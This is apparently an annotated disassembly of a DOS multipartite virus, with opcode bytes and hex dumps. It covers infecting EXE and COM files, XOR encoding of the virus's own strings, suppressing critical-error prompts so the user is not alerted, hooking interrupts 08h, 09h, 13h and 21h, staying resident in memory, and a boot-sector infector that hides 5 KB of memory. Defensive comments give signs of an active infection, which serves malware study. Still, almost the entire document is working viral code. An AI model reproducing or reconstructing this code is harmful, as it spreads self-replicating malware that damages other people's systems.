0976 C7063000630B MOV Word Ptr [0030],0B63 ; new IP = EXE entry point of the virus
097C A32A00 MOV [002A],AX ; new SS = new CS
097F C7062C00FE0D MOV Word Ptr [002C],0DFE ; new SP
0985 33C9 XOR CX,CX
0987 8BD1 MOV DX,CX
0989 B80042 MOV AX,4200
098C CD21 INT 21
098E 720A JB 099A
0990 B91C00 MOV CX,001C
0993 BA1C00 MOV DX,001C
0996 B440 MOV AH,40 ; write the modified header
0998 CD21 INT 21
099A 7211 JB 09AD
099C 3BC1 CMP AX,CX ; short write -> give up
099E 7533 JNZ 09D3
09A0 8B164400 MOV DX,[0044]
09A4 8B0E4600 MOV CX,[0046]
09A8 B80042 MOV AX,4200
09AB CD21 INT 21
09AD 7224 JB 09D3
09AF A10300 MOV AX,[0003]
09B2 0C01 OR AL,01
09B4 A20500 MOV [0005],AL ; new key byte for this copy
09B7 C606480001 MOV Byte Ptr [0048],01
09BC E86B00 CALL 0A2A ; encode
09BF 33D2 XOR DX,DX
09C1 B90010 MOV CX,1000
09C4 B440 MOV AH,40 ; append the 1000h-byte body
09C6 CD21 INT 21
09C8 E85F00 CALL 0A2A ; decode the resident copy again
09CB C606480000 MOV Byte Ptr [0048],00
09D0 E88500 CALL 0A58
09D3 2E833E380000 CMP Word Ptr CS:[0038],+00
09D9 7404 JZ 09DF
09DB B449 MOV AH,49 ; free the COM work block
09DD CD21 INT 21
09DF 2E833E0A00FF CMP Word Ptr CS:[000A],-01
09E5 7431 JZ 0A18
09E7 2E8B1E0A00 MOV BX,CS:[000A]
09EC 2E8B160E00 MOV DX,CS:[000E]
09F1 2E8B0E1000 MOV CX,CS:[0010]
09F6 B80157 MOV AX,5701 ; put the original date/time back
09F9 CD21 INT 21
09FB B43E MOV AH,3E
09FD CD21 INT 21
09FF 2EC5160600 LDS DX,CS:[0006]
0A04 2E8B0E0C00 MOV CX,CS:[000C]
0A09 B80143 MOV AX,4301 ; put the original attributes back
0A0C CD21 INT 21
0A0E 2EC516230A LDS DX,CS:[0A23]
0A13 B82425 MOV AX,2524 ; restore the previous INT 24h vector
0A16 CD21 INT 21
0A18 07 POP ES
0A19 1F POP DS
0A1A 5F POP DI
0A1B 5E POP SI
0A1C 5A POP DX
0A1D 59 POP CX
0A1E 5B POP BX
0A1F 58 POP AX
0A20 E99FFC JMP 06C2
; The four bytes at 0A23..0A26 are the storage for the saved INT 24h
; vector (written at 0826/082A); the disassembler shows them as code.
0A23 BF0563 MOV DI,6305
0A26 16 PUSH SS
;===============================================================
; Interrupt 24H (critical error) handler
;
; Installed only for the duration of a file infection. Returning AL=0
; tells DOS to ignore the error, so a write-protected or failing disk
; produces no "Abort, Retry, Ignore" prompt that would alert the user.
;
0A27 32C0 XOR AL,AL
0A29 CF IRET
;=====================================================================
; ENCODING PROCEDURE: encodes from 51H, length 262H.
;
; 0A2A: XORs the 262h bytes at CS:0051h..02B2h in place with the key
;       byte at [0005]. XOR is its own inverse, so the same call both
;       encodes and decodes. All registers and segment registers are
;       preserved. The region covers the file-name strings, the text
;       message and the note tables; the code itself is not encoded, so
;       it remains a stable signature in infected files while the text
;       strings differ between copies with different key bytes.
; 0A4D: clears AX, BX, DX, SI and DI before control is given to the host.
; 0A58: increments the counter at CS:[0049].
; 0A5E: start-up initialisation (see comments below).
;
0A2A 1E PUSH DS
0A2B 06 PUSH ES
0A2C 57 PUSH DI
0A2D 56 PUSH SI
0A2E 51 PUSH CX
0A2F 50 PUSH AX
0A30 0E PUSH CS
0A31 07 POP ES
0A32 0E PUSH CS
0A33 1F POP DS
0A34 BE5100 MOV SI,0051
0A37 8BFE MOV DI,SI
0A39 B96202 MOV CX,0262
0A3C 8A260500 MOV AH,[0005] ; single-byte key
0A40 AC LODSB
0A41 32C4 XOR AL,AH
0A43 AA STOSB
0A44 E2FA LOOP 0A40
0A46 58 POP AX
0A47 59 POP CX
0A48 5E POP SI
0A49 5F POP DI
0A4A 07 POP ES
0A4B 1F POP DS
0A4C C3 RET
0A4D 33C0 XOR AX,AX
0A4F 8BD8 MOV BX,AX
0A51 8BD0 MOV DX,AX
0A53 8BF0 MOV SI,AX
0A55 8BF8 MOV DI,AX
0A57 C3 RET
0A58 2EFE064900 INC Byte Ptr CS:[0049]
0A5D C3 RET
; 0A5E: counts how many INT 1Ah polls fit into one clock tick and stores
; twice that number in [003A] (the delay ceiling of the INT 08h
; handler). A byte read from timer port 40h XORed with the key byte
; selects the behaviour flag [003F]: values 00h..1Fh give [003F]=1.
; The remaining state bytes are reset to their start values.
0A5E 1E PUSH DS
0A5F 0E PUSH CS
0A60 1F POP DS
0A61 B400 MOV AH,00
0A63 CD1A INT 1A
0A65 8BDA MOV BX,DX
0A67 CD1A INT 1A
0A69 3BDA CMP BX,DX
0A6B 74FA JZ 0A67 ; wait for the tick count to change
0A6D 33F6 XOR SI,SI
0A6F 8BDA MOV BX,DX
0A71 CD1A INT 1A
0A73 46 INC SI ; SI = polls during one full tick
0A74 3BDA CMP BX,DX
0A76 74F9 JZ 0A71
0A78 8BDE MOV BX,SI
0A7A D1E3 SHL BX,1
0A7C 891E3A00 MOV [003A],BX
0A80 C6063F0000 MOV Byte Ptr [003F],00
0A85 C606480000 MOV Byte Ptr [0048],00
0A8A E440 IN AL,40
0A8C 8AE0 MOV AH,AL
0A8E E440 IN AL,40
0A90 8AC4 MOV AL,AH ; the first byte read is the one used
0A92 2E32060500 XOR AL,CS:[0005]
0A97 3C1F CMP AL,1F
0A99 7705 JA 0AA0
0A9B C6063F0001 MOV Byte Ptr [003F],01
0AA0 C70603000100 MOV Word Ptr [0003],0001
0AA6 C7064B000000 MOV Word Ptr [004B],0000
0AAC C6064A0001 MOV Byte Ptr [004A],01
0AB1 C6063E0000 MOV Byte Ptr [003E],00
0AB6 C606730F00 MOV Byte Ptr [0F73],00
0ABB 90 NOP
0ABC 1F POP DS
0ABD C3 RET
;=====================================================================
; Check for a copy at the top of memory (called first from both file
; entry points).
;
; The "-10:" prefix is how the debugger displayed the segment for the
; COM sample; offsets are relative to the virus base.
; The segment of the top of conventional memory is derived from the
; BIOS memory-size word at 0000:0413 (KB * 64 = paragraphs).
;   - Word 3CCBh at offset 3Eh of that segment: the word is replaced by
;     FFFEh and two interrupt vectors are copied inside segment 0:
;     0204h -> 0020h (INT 08h) and 020Ch -> 004Ch (INT 13h).
;     NOTE(review): where the copies at 0000:0204/020C are made is not
;     visible in this listing.
;   - Otherwise, if the word at 0E40h is FFFEh: the INT 21h residency
;     check (AX=4243h -> 5678h) is made; if no copy answers, [0F74] is
;     set to 1 and the INT 21h vector is read into [06C5]/[06C7] of
;     that segment.
;     NOTE(review): no INT 21 follows the MOV AX,2521 at 0C05 (the next
;     address is 0C08), so the set-vector call is not issued here.
;
-10:0BBE 1E PUSH DS
-10:0BBF 06 PUSH ES
-10:0BC0 33C0 XOR AX,AX
-10:0BC2 8ED8 MOV DS,AX
-10:0BC4 A11304 MOV AX,[0413] ; memory size in KB
-10:0BC7 B106 MOV CL,06 ; convert to paragraphs
-10:0BC9 D3E0 SHL AX,CL
-10:0BCB 8ED8 MOV DS,AX
-10:0BCD 33F6 XOR SI,SI ; At the end of memory we check
-10:0BCF 8B443E MOV AX,[SI+3E] ; whether the virus is present.
-10:0BD2 3DCB3C CMP AX,3CCB
-10:0BD5 7434 JZ 0C0B ;
-10:0BD7 833E400EFE CMP Word Ptr [0E40],-02
-10:0BDC 7403 JZ 0BE1
-10:0BDE EB4E JMP 0C2E
-10:0BE0 90 NOP
-10:0BE1 FA CLI
-10:0BE2 B3FF MOV BL,FF
-10:0BE4 B84342 MOV AX,4243 ; residency check
-10:0BE7 CD21 INT 21
-10:0BE9 3D7856 CMP AX,5678
-10:0BEC 741A JZ 0C08
-10:0BEE C606740F01 MOV Byte Ptr [0F74],01
-10:0BF3 90 NOP
-10:0BF4 FB STI
-10:0BF5 B82135 MOV AX,3521
-10:0BF8 CD21 INT 21
-10:0BFA 891EC506 MOV [06C5],BX
-10:0BFE 8C06C706 MOV [06C7],ES
-10:0C02 BA9A06 MOV DX,069A
-10:0C05 B82125 MOV AX,2521
-10:0C08 EB24 JMP 0C2E
-10:0C0A 90 NOP
-10:0C0B C7443EFEFF MOV Word Ptr [SI+3E],FFFE
-10:0C10 33C0 XOR AX,AX
-10:0C12 8ED8 MOV DS,AX
-10:0C14 8EC0 MOV ES,AX
-10:0C16 BE0402 MOV SI,0204
-10:0C19 BF2000 MOV DI,0020
-10:0C1C B90200 MOV CX,0002
-10:0C1F FA CLI
-10:0C20 F3 A5 REPZ MOVSW
-10:0C22 FB STI
-10:0C23 BE0C02 MOV SI,020C
-10:0C26 BF4C00 MOV DI,004C
-10:0C29 B90200 MOV CX,0002
-10:0C2C F3 A5 REPZ MOVSW
-10:0C2E 07 POP ES
-10:0C2F 1F POP DS
-10:0C30 C3 RET
;---------------------------------------------------------------------
; virus entry point for COM
;
; Reached from the JMP at the start of an infected COM file.
;   - If a resident copy answers the residency check (INT 21h AX=4243h
;     returns 5678h), the private function AX=4244h is called with
;     SI = 1100h (host image), DI = 0100h and CX = original length from
;     [0014]; the resident handler moves the host down and runs it.
;   - Otherwise SS:SP is set up inside the virus and a RETF to
;     (CS+10h):0B63 continues at the common entry code, with the
;     segment adjusted so that the virus body starts at offset 0.
;
-10:0C31 E88AFF CALL 0BBE
-10:0C34 B3FF MOV BL,FF
-10:0C36 B84342 MOV AX,4243
-10:0C39 CD21 INT 21
-10:0C3B 3D7856 CMP AX,5678
-10:0C3E 7513 JNZ 0C53
-10:0C40 B84442 MOV AX,4244
-10:0C43 BF0001 MOV DI,0100
-10:0C46 2E8B8D1400 MOV CX,CS:[DI+0014]
-10:0C4B BE0010 MOV SI,1000
-10:0C4E 03F7 ADD SI,DI
-10:0C50 FC CLD
-10:0C51 CD21 INT 21
-10:0C53 8CCB MOV BX,CS
-10:0C55 83C310 ADD BX,+10
-10:0C58 8ED3 MOV SS,BX
-10:0C5A BCEE0D MOV SP,0DEE
-10:0C5D 53 PUSH BX
-10:0C5E BB630B MOV BX,0B63
-10:0C61 53 PUSH BX
-10:0C62 CB RETF
;---------------------------------------------------------------------
; EXECUTION CONTINUES HERE AFTER THE RETF (C62) + entry point for EXE
;
; The two lines after this header and the two lines before 0BEC are
; register dumps from the debugger session, not code.
;   - The PSP segment (ES on entry) is saved in [0016] and in the three
;     segment fields of the parameter block at 0070h.
;   - The saved host CS ([0BA8]) and SS ([0042]) are relocated by
;     PSP + 10h.
;   - Resident copy present: the host's SS:SP is restored, registers
;     are cleared and the far JMP at 0BA5 enters the host (its operand
;     is the saved CS:IP).
;   - Not resident: the data region is decoded (0A2A), state is
;     initialised (0A5E), and a three-byte stub "REP MOVSW / RETF" is
;     placed at 0000:03F0 after saving the bytes that were there. The
;     stub copies 0800h words of the virus to (PSP+10h):0000 and returns
;     to offset 0BEC of that copy.
;
AX=0006 BX=0B63 CX=1006 DX=0000 SP=0DEE BP=0000 SI=0000 DI=0000
DS=48C5 ES=48C5 SS=CS CS=CS IP=0B63 NV UP EI PL NZ NA PO NC
0B63 FC CLD
0B64 06 PUSH ES
0B65 E856FF CALL 0ABE (procedura BBE)
0B68 2E8C061600 MOV CS:[0016],ES
0B6D 2E8C067400 MOV CS:[0074],ES
0B72 2E8C067800 MOV CS:[0078],ES
0B77 2E8C067C00 MOV CS:[007C],ES
0B7C 8CC3 MOV BX,ES
0B7E 83C310 ADD BX,+10
0B81 2E011EA80B ADD CS:[0BA8],BX
0B86 2E011E4200 ADD CS:[0042],BX
0B8B B3FF MOV BL,FF
0B8D B84342 MOV AX,4243 ; residency check
0B90 CD21 INT 21
0B92 3D7856 CMP AX,5678
0B95 7513 JNZ 0BAA
0B97 07 POP ES
0B98 2E8E164200 MOV SS,CS:[0042]
0B9D 2E8B264000 MOV SP,CS:[0040]
0BA2 E8A8FE CALL 0A4D
0BA5 EA20202020 JMP 2020:2020 ; operand = saved host CS:IP (not filled in for this COM sample)
0BAA E87DFE CALL 0A2A
0BAD E8AEFE CALL 0A5E
0BB0 33C0 XOR AX,AX
0BB2 8EC0 MOV ES,AX
0BB4 26A1F003 MOV AX,ES:[03F0] ; save the three bytes at 0000:03F0
0BB8 2EA31800 MOV CS:[0018],AX
0BBC 26A0F203 MOV AL,ES:[03F2]
0BC0 2EA21A00 MOV CS:[001A],AL
0BC4 26C706F003F3A5 MOV Word Ptr ES:[03F0],A5F3 ; 0:3F0 F3 A5 REPZ MOVSW
0BCB 26C606F203CB MOV Byte Ptr ES:[03F2],CB ; 0:3F2 CB RETF
0BD1 58 POP AX ; PSP segment pushed at 0B64
0BD2 051000 ADD AX,0010
0BD5 8EC0 MOV ES,AX
0BD7 0E PUSH CS
0BD8 1F POP DS
0BD9 B90010 MOV CX,1000
0BDC D1E9 SHR CX,1
0BDE 33F6 XOR SI,SI
0BE0 8BFE MOV DI,SI
0BE2 06 PUSH ES
0BE3 B8EC0B MOV AX,0BEC
0BE6 50 PUSH AX
0BE7 EAF0030000 JMP 0000:03F0
AX=0BEC BX=0E1A CX=0800 DX=2D4C SP=0DEA BP=0000 SI=0000 DI=0000
DS= CS ES= CS SS= CS CS= CS IP=0BE7 NV UP EI PL ZR NA PE NC
;---------------------------------------------------------------------
; Installation from an infected file (runs in the relocated copy).
;
;   1. Stack inside the virus; the three bytes at 0000:03F0 are restored.
;   2. The program's memory block is shrunk to 140h paragraphs
;      (1000h bytes / 16 + 40h).
;   3. INT 21h is hooked to 069A (previous vector kept at 06C5/06C7).
;   4. The program's own path is located after the double NUL that ends
;      the environment block (segment at PSP:002C).
;   5. INT 08h, INT 09h and INT 13h are hooked to 02B3, 0373 and 04F0;
;      the previous vectors are stored in the operands of the far JMPs
;      at 02D8, 03B9 and 0633.
;   6. The program is run again through the original INT 21h (EXEC,
;      AX=4B00h, parameter block at 0070h); this time the residency
;      check succeeds and the host runs normally.
;   7. The child's exit code is fetched (AH=4Dh) and the virus stays
;      resident with AH=31h, keeping 140h paragraphs.
; Defensive relevance: a 140h-paragraph resident block owning the
; INT 08h/09h/13h/21h vectors, and a positive answer to the AX=4243h
; check, identify an active infection in memory.
;
0BEC 8CC8 MOV AX,CS
0BEE 8ED0 MOV SS,AX
0BF0 BCEE0D MOV SP,0DEE
0BF3 33C0 XOR AX,AX
0BF5 8ED8 MOV DS,AX
0BF7 2EA11800 MOV AX,CS:[0018]
0BFB A3F003 MOV [03F0],AX
0BFE 2EA01A00 MOV AL,CS:[001A]
0C02 A2F203 MOV [03F2],AL
0C05 BB0010 MOV BX,1000
0C08 B104 MOV CL,04
0C0A D3EB SHR BX,CL
0C0C 83C340 ADD BX,+40
0C0F B44A MOV AH,4A ; modify allocated memory
0C11 2E8E061600 MOV ES,CS:[0016]
0C16 CD21 INT 21
0C18 B82135 MOV AX,3521
0C1B CD21 INT 21
0C1D 2E891EC506 MOV CS:[06C5],BX
0C22 2E8C06C706 MOV CS:[06C7],ES
0C27 0E PUSH CS
0C28 1F POP DS
0C29 BA9A06 MOV DX,069A
0C2C B82125 MOV AX,2521
0C2F CD21 INT 21
0C31 8E061600 MOV ES,[0016]
0C35 268E062C00 MOV ES,ES:[002C] ; environment segment from the PSP
0C3A 33FF XOR DI,DI
0C3C B9FF7F MOV CX,7FFF
0C3F 32C0 XOR AL,AL
0C41 F2AE REPNZ SCASB
0C43 263805 CMP ES:[DI],AL
0C46 E0F9 LOOPNZ 0C41 ; stop at the empty string that ends the environment
0C48 8BD7 MOV DX,DI
0C4A 83C203 ADD DX,+03 ; skip the NUL and the word that precede the program path
0C4D B8004B MOV AX,4B00
0C50 06 PUSH ES
0C51 1F POP DS
0C52 0E PUSH CS
0C53 07 POP ES
0C54 BB7000 MOV BX,0070
0C57 1E PUSH DS
0C58 06 PUSH ES
0C59 50 PUSH AX
0C5A 53 PUSH BX
0C5B 51 PUSH CX
0C5C 52 PUSH DX
0C5D 0E PUSH CS
0C5E 1F POP DS
0C5F B80835 MOV AX,3508
0C62 CD21 INT 21
0C64 891ED902 MOV [02D9],BX
0C68 8C06DB02 MOV [02DB],ES
0C6C BAB302 MOV DX,02B3
0C6F B80825 MOV AX,2508
0C72 CD21 INT 21
0C74 B80935 MOV AX,3509
0C77 CD21 INT 21
0C79 891EBA03 MOV [03BA],BX
0C7D 8C06BC03 MOV [03BC],ES
0C81 BA7303 MOV DX,0373
0C84 B80925 MOV AX,2509
0C87 CD21 INT 21
0C89 B81335 MOV AX,3513
0C8C CD21 INT 21
0C8E 891E3406 MOV [0634],BX
0C92 8C063606 MOV [0636],ES
0C96 BAF004 MOV DX,04F0
0C99 B81325 MOV AX,2513
0C9C CD21 INT 21
0C9E 5A POP DX
0C9F 59 POP CX
0CA0 5B POP BX
0CA1 58 POP AX
0CA2 07 POP ES
0CA3 1F POP DS
0CA4 9C PUSHF
0CA5 2EFF1EC506 CALL FAR CS:[06C5] ; EXEC through the original INT 21h handler
0CAA 1E PUSH DS
0CAB 07 POP ES
0CAC B449 MOV AH,49
0CAE CD21 INT 21
0CB0 B44D MOV AH,4D
0CB2 CD21 INT 21
0CB4 B431 MOV AH,31 ; terminate and stay resident; AL still holds the child's exit code
0CB6 BA0010 MOV DX,1000
0CB9 B104 MOV CL,04
0CBB D3EA SHR DX,CL
0CBD 83C240 ADD DX,+40
0CC0 CD21 INT 21
0CC0 00 00 00 00 00 00-00 00 00 00 00 00 00 00
0CD0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
.
.
.
0DB0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
0DC0 00 00 00 00 00 00 F0 0C-FF 48 C5 48 57 18 06 00 ......p..HEHW...
0DD0 C5 48 00 00 00 00 C5 48-D5 48 00 00 EC 0B 59 09 EH....EHUH..l.Y.
0DE0 EC 0B 00 00 EC 0B 00 00-EC 0B D5 48 C0 3F 40 00 l...l...l.UH@?@.
0DF0 F5 19 73 0A F5 19 46 02-22 15 EC 0B 32 15 00 00 u.s.u.F.".l.2...
;===========================================================================
; BOOT virus
;
; This is the 512-byte image that replaces the boot sector. The hex
; dump shows it keeps a normal-looking layout: the OEM name and disk
; parameter area copied from the original sector, the usual DOS error
; messages, and the 55 AA signature at the end. The infection marker
; is the word 3CCBh at offset 3Eh, followed by FFFEh/FFFEh at 40h/42h
; and the location of the stored body at 44h (sector/track) and 46h
; (drive/head).
; Code at 009F: the BIOS loads the sector at 0000:7C00. The segment
; registers are rebased to CS + 06E0h so that the same bytes appear at
; offset 0E00h, which is where the boot image sits inside the 1000h-byte
; virus body; the RETF continues at offset 0EB9 in that new segment.
;
0000 E99C00 JMP 009F
0000 E9 9C 00 4D 53 44 4F 53-34 2E 30 00 02 01 01 00 i..MSDOS4.0.....
0010 02 E0 00 40 0B F0 09 00-12 00 02 00 00 00 00 00 .`.@.p..........
0020 00 00 00 00 00 00 29 DC-49 4F 20 20 20 20 20 20 ......)\IO
0030 53 59 53 4D 53 44 4F 53-20 20 20 53 59 53 CB 3C SYSMSDOS SYSK<
0040 FE FF FE FF 07 00 80 00-4E 6F 6E 2D 73 79 73 74 ~.~.....Non-syst
0050 65 6D 20 64 69 73 6B 20-6F 72 20 64 69 73 6B 20 em disk or disk
0060 65 72 72 6F 72 2E 0A 0D-52 65 70 6C 61 63 65 20 error...Replace
0070 61 6E 64 20 73 74 72 69-6B 65 20 61 6E 79 20 6B and strike any k
0080 65 79 20 77 68 65 6E 20-72 65 61 64 79 44 69 73 ey when readyDis
0090 6B 20 62 6F 6F 74 20 66-61 69 6C 75 72 65 2E k boot failure.
009F B8006E MOV AX,6E00
00A2 B104 MOV CL,04
00A4 D3E8 SHR AX,CL
00A6 8CC9 MOV CX,CS
00A8 03C1 ADD AX,CX
00AA 8ED8 MOV DS,AX
00AC 8EC0 MOV ES,AX
00AE 8ED1 MOV SS,CX
00B0 BCF0FF MOV SP,FFF0
00B3 1E PUSH DS
00B4 B8B90E MOV AX,0EB9
00B7 50 PUSH AX
00B8 CB RETF
;=======================================================================
; continuation after RETF - code is contiguous, CS changes
;
; Boot-time installation:
;   0EB9  The boot drive (DL) is saved. If the word at offset 0E40h of
;         the top-of-memory segment is already FFFEh, only the first
;         40h bytes of the sector at 0000:7C00 are copied to 0E00h of
;         that segment and execution resumes there at 0F52.
;   0EEB  Otherwise the BIOS memory-size word at 0000:0413 is lowered
;         by 5 (KB), eight sectors (the 1000h-byte body) are read from
;         the location stored at [0E44]/[0E46] to offset 0 of the
;         reserved area, and execution continues there at 0F18.
;   0F18  State is initialised (0A5E) and INT 08h, 09h and 13h are
;         hooked by writing the interrupt table directly (routine 0FBF).
;         INT 08h goes to the boot-time handler at 0F75, which later
;         hooks INT 21h once DOS has set that vector.
;   0F52  The offset word of the INT 21h vector (0000:0084) is set to
;         FFFFh as a "DOS not loaded yet" sentinel, the original boot
;         sector is read from "stored sector + 8" to 0000:7C00 and
;         started, so the machine boots normally.
; Defensive relevance: BIOS-reported conventional memory 5 KB lower
; than installed, with INT 13h pointing into that hidden area, is the
; observable effect of this code.
;
0EB9 8816460E MOV [0E46],DL
0EBD 33C0 XOR AX,AX
0EBF 8ED8 MOV DS,AX
0EC1 A11304 MOV AX,[0413] ; memory size in kB
0EC4 B106 MOV CL,06
0EC6 D3E0 SHL AX,CL
0EC8 8ED8 MOV DS,AX ; convert to paragraphs
0ECA 833E400EFE CMP Word Ptr [0E40],-02
0ECF 751A JNZ 0EEB
0ED1 B8520F MOV AX,0F52
0ED4 1E PUSH DS
0ED5 50 PUSH AX
0ED6 1E PUSH DS
0ED7 07 POP ES
0ED8 BF000E MOV DI,0E00
0EDB 33C0 XOR AX,AX
0EDD 8ED8 MOV DS,AX
0EDF BE007C MOV SI,7C00
0EE2 B94000 MOV CX,0040
0EE5 FA CLI
0EE6 FC CLD
0EE7 F3A4 REPZ MOVSB
0EE9 FB STI
0EEA CB RETF
0EEB 33C0 XOR AX,AX
0EED 8ED8 MOV DS,AX
0EEF A11304 MOV AX,[0413]
0EF2 2D0500 SUB AX,0005 ; hide 5 KB from DOS
0EF5 A31304 MOV [0413],AX
0EF8 B106 MOV CL,06
0EFA D3E0 SHL AX,CL
0EFC 8ED8 MOV DS,AX
0EFE 8EC0 MOV ES,AX
0F00 2E8B16460E MOV DX,CS:[0E46]
0F05 33DB XOR BX,BX
0F07 2E8B0E440E MOV CX,CS:[0E44]
0F0C B80802 MOV AX,0208 ; read 8 sectors: the virus body
0F0F E8C800 CALL 0FDA
0F12 1E PUSH DS
0F13 B8180F MOV AX,0F18
0F16 50 PUSH AX
0F17 CB RETF
0F18 8816460E MOV [0E46],DL
0F1C 33C0 XOR AX,AX
0F1E 8ED8 MOV DS,AX
0F20 0E PUSH CS
0F21 07 POP ES
0F22 E839FB CALL 0A5E
0F25 2EC606740F00 MOV Byte Ptr CS:[0F74],00 ; INT 21h not hooked yet
0F2B 90 NOP
0F2C 8CC9 MOV CX,CS
0F2E BFD902 MOV DI,02D9 ; set up interrupt 8
0F31 BE2000 MOV SI,0020
0F34 BA750F MOV DX,0F75
0F37 E88500 CALL 0FBF
0F3A BE2400 MOV SI,0024 ; set up interrupt 9
0F3D BFBA03 MOV DI,03BA
0F40 BA7303 MOV DX,0373
0F43 E87900 CALL 0FBF
0F46 BE4C00 MOV SI,004C ; set up interrupt 13
0F49 BF3406 MOV DI,0634
0F4C BAF004 MOV DX,04F0
0F4F E86D00 CALL 0FBF
0F52 1E PUSH DS
0F53 07 POP ES
0F54 C7068400FFFF MOV Word Ptr [0084],FFFF
0F5A BB007C MOV BX,7C00
0F5D 2E8B0E440E MOV CX,CS:[0E44]
0F62 80C108 ADD CL,08 ; ninth stored sector = original boot sector
0F65 2E8B16460E MOV DX,CS:[0E46]
0F6A B80102 MOV AX,0201
0F6D E86A00 CALL 0FDA
0F70 1E PUSH DS
0F71 53 PUSH BX
0F72 CB RETF
; Data: [0F73] = tick counter, [0F74] = "INT 21h already hooked" flag.
0F73 00 01
; Boot-time INT 08h handler. DOS is not loaded when the boot code runs,
; so the INT 21h hook is deferred: on every tick the offset word of the
; INT 21h vector (0000:0084) is compared with the FFFFh sentinel
; written at 0F54. Once it has changed, [0F73] is advanced by 2 per
; tick and, when the byte wraps, INT 21h is hooked to 069A through
; 0FBF and [0F74] is set. From then on the handler goes straight to the
; normal INT 08h code at 02B3.
0F75 FA CLI
0F76 2E803E740F00 CMP Byte Ptr CS:[0F74],00
0F7C 7404 JZ 0F82
0F7E E932F3 JMP 02B3
0F82 1E PUSH DS
0F83 06 PUSH ES
0F84 50 PUSH AX
0F85 53 PUSH BX
0F86 51 PUSH CX
0F87 52 PUSH DX
0F88 56 PUSH SI
0F89 57 PUSH DI
0F8A 33C0 XOR AX,AX
0F8C 8ED8 MOV DS,AX
0F8E A18400 MOV AX,[0084]
0F91 3DFFFF CMP AX,FFFF ; sentinel still there: DOS has not set INT 21h yet
0F94 741E JZ 0FB4
0F96 2E8006730F02 ADD Byte Ptr CS:[0F73],02
0F9C 7316 JNB 0FB4 ; wait until the byte counter wraps
0F9E 2EC606740F01 MOV Byte Ptr CS:[0F74],01
0FA4 0E PUSH CS
0FA5 07 POP ES
0FA6 BE8400 MOV SI,0084
0FA9 BFC506 MOV DI,06C5
0FAC 8CC9 MOV CX,CS
0FAE BA9A06 MOV DX,069A
0FB1 E80B00 CALL 0FBF
0FB4 5F POP DI
0FB5 5E POP SI
0FB6 5A POP DX
0FB7 59 POP CX
0FB8 5B POP BX
0FB9 58 POP AX
0FBA 07 POP ES
0FBB 1F POP DS
0FBC E919F3 JMP 02D8 ; chain to the previous INT 08h handler
; 0FBF: hook one interrupt by editing the interrupt table in segment 0.
; In:  SI = offset of the vector in segment 0, ES:DI = where to keep the
;      previous vector, CX:DX = new handler (segment:offset).
; The previous four bytes are copied to ES:DI, then the new offset and
; segment are stored with interrupts disabled. AX, CX and DS are
; preserved; SI ends up pointing at the vector again and DI is advanced
; by 4.
0FBF 1E PUSH DS
0FC0 50 PUSH AX
0FC1 33C0 XOR AX,AX
0FC3 8ED8 MOV DS,AX
0FC5 58 POP AX
0FC6 51 PUSH CX
0FC7 FC CLD
0FC8 B90200 MOV CX,0002
0FCB F3A5 REPZ MOVSW
0FCD 59 POP CX
0FCE 83EE04 SUB SI,+04
0FD1 FA CLI
0FD2 8914 MOV [SI],DX
0FD4 894C02 MOV [SI+02],CX
0FD7 FB STI
0FD8 1F POP DS
0FD9 C3 RET
; 0FDA: boot-time INT 13h call that retries until it succeeds.
; The requested function (AX) is kept in SI; after an error the drive
; is reset (AH=00) and the call repeated. There is no retry limit, so a
; persistently failing read keeps the boot code in this loop.
0FDA 56 PUSH SI
0FDB 8BF0 MOV SI,AX
0FDD CD13 INT 13
0FDF 7308 JNB 0FE9
0FE1 B400 MOV AH,00
0FE3 CD13 INT 13
0FE5 8BC6 MOV AX,SI
0FE7 EBF4 JMP 0FDD
0FE9 5E POP SI
0FEA C3 RET
0FE0 08 B4 00 CD 13 8B C6 EB-F4 5E C3 00 00 00 00 00 .4.M..Fkt^C.....
0FF0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 55 AA ..............U*